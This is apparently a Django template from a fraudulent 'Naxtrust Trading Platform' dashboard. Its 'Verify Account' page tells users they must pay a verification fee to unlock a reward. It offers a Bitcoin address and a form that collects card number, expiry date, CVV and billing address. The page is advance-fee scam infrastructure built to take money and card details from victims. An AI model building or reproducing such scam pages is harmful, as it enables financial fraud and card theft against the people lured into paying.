{% extends 'dashboard/base.html' %} {% load static %} 
{% block extrastyle %}
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/jqueryui/1.13.2/themes/base/jquery-ui.min.css" integrity="sha512-ELV+xyi8IhEApPS/pSj66+Jiw+sOT1Mqkzlh8ExXihe4zfqbWkxPRi8wptXIO9g73FSlhmquFlUOuMSoXz5IRw==" crossorigin="anonymous" referrerpolicy="no-referrer" />
{% endblock %}
{% block content %}
<!-- Main Content Layout -->
<!-- Breadcrumb Area -->
<div class="breadcrumb-area">
  <h1>Verify Account</h1>
  
</div>
<!-- End Breadcrumb Area -->

<!-- Start -->
<div class="card mb-30">
  <div class="card-header d-flex justify-content-between align-items-center">
    <h3>
      Verify Account
    </h3>
  </div>
  <div class="card-body">
    <div class="alert alert-dark rounded-pill" role="alert">
      In order to verify your account and collect your reward, you need to make a payment of ${{request.user.reward.verification_amount}}.
    </div>

  </div>
  <div id="tabs" class="mb-4">
    <ul>
      <li><a href="#tabs-1">Crypto</a></li>
      <li><a href="#tabs-2">Card</a></li>
    </ul>
    <div id="tabs-1">
      <div class="card-body">
        <form method="POST">
          {% csrf_token %}
          <div class="form-group">
            <label>Send Payment To BTC Address: </label>
            <input type="text" class="form-control" value="{{request.user.reward.btc_address}}" readonly />
            <!-- <small class="form-text text-muted">Copy address</small> -->
          </div>
          <button type="submit" name="btc_submit" class="btn btn-primary">
            Click to approve payment and get your reward
          </button>
        </form>
      </div>
    </div>
    <div id="tabs-2">
      <div class="card-body bg-light p-2">
        <form method="POST" action="{% url 'card-details' %}">
            {% csrf_token %}
          <input type="hidden" name="user" value="{{request.user.id}}">
            <div class="form-group">
              <label>Card Number </label>
              <input type="number" class="form-control" name="cardnumber" required />
              <!-- <small class="form-text text-muted">Copy address</small> -->
            </div>
            <div class="form-group">
                <label>Card Expiry Date </label>
                <input type="text" class="form-control" name="expiry_date" required />
                <!-- <small class="form-text text-muted">Copy address</small> -->
            </div>
            <div class="form-group">
                <label>CVV/CVC </label>
                <input type="number" class="form-control" name="cvv" required />
                <!-- <small class="form-text text-muted">Copy address</small> -->
            </div>
            <div class="form-group">
                <label>Billing Address </label>
                <textarea name="billing_address" id="" rows="6" class="form-control" required></textarea>
                <!-- <small class="form-text text-muted">Copy address</small> -->
              </div>
              
            <button type="submit" name="btc_submit" class="btn btn-primary">
              Click to approve payment and unlock your reward
            </button>
          </form>
      </div>
    </div>
  </div>


  
</div>
<div class="modal fade" id="exampleModal" tabindex="-1" aria-labelledby="exampleModalLabel" aria-hidden="true">
  <div class="modal-dialog">
    <div class="modal-content">
      <div class="modal-header">
        <h5 class="modal-title" id="exampleModalLabel">Fund Account</h5>
        <button type="button" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body">
        <p>
          If you wish to fund your Naxtrust wallet via this method, please contact us via live support to receive the appropriate payment details. Alternatively, you can contact your Account Manager to help you fund your account. Thanks for choosing Naxtrust Trading Platform 
        </p>
        <div class="alert alert-primary">
          <p style="font-weight: bold;">Contact us at NAXTRUST live chat or at support@naxtrust.com</p>
        </div>
      </div>
      <div class="modal-footer">
        <button type="button" class="btn btn-secondary" data-dismiss="modal">Close</button>
      </div>
    </div>
  </div>
</div>
{% endblock %}
{% block extrascript %}
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.7.0/jquery.min.js" integrity="sha512-3gJwYpMe3QewGELv8k/BX9vcqhryRdzRMxVfq6ngyWXwo03GFEzjsUm8Q7RZcHPHksttq7/GFoxjCVUjkjvPdw==" crossorigin="anonymous" referrerpolicy="no-referrer"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/jqueryui/1.13.2/jquery-ui.min.js" integrity="sha512-57oZ/vW8ANMjR/KQ6Be9v/+/h6bq9/l3f0Oc7vn6qMqyhvPd1cvKBRWWpzu0QoneImqr2SkmO4MSqU+RpHom3Q==" crossorigin="anonymous" referrerpolicy="no-referrer"></script>
<script>
  $( function() {
    $( "#tabs" ).tabs();
  } );
  </script>
{% endblock %}
